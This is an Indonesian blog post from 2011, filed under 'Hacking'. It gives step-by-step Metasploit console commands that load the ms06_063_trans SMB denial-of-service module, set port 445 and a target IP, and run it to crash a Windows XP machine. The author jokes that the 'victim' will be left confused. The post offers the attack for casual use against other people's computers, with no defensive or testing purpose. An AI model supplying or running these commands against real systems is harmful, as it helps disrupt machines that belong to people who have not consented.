buat window kaget sendiri melalui metasploit

Posted: September 20, 2011 in Hacking

by Rian Cihuy Evolution

lagi-lagi window jadi bahan praktek..saya baru dapat ilmu 1 lagi ne..mungkin abang2 semua dah pernah coba..tapi tak apa lah,, mungkin ada yang belum tau bisa jadi ilmu juga.. :Dne langsung aja ke KTP😀 (canda dikit)

msfconsole #buka dulu msfconsole
msf > use dos/windows/smb/ms06_063_trans
msf auxiliary(ms06_063_trans) > set LPORT 445 # setting port ke 445
msf auxiliary(ms06_063_trans) > set RHOST IP_TARGET # ip address target bro
msf auxiliary(ms06_063_trans) > run

taraaaaaaaaaaaaaaaaa….bingung deh tu si korban..
ini saya coba korban nya windows XPklo vista,, seven 7,, belum saya coba..Demikian ilmu yang saya dapat,, lebih kurang saya minta maaf..Assalamu’alaikum ..

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s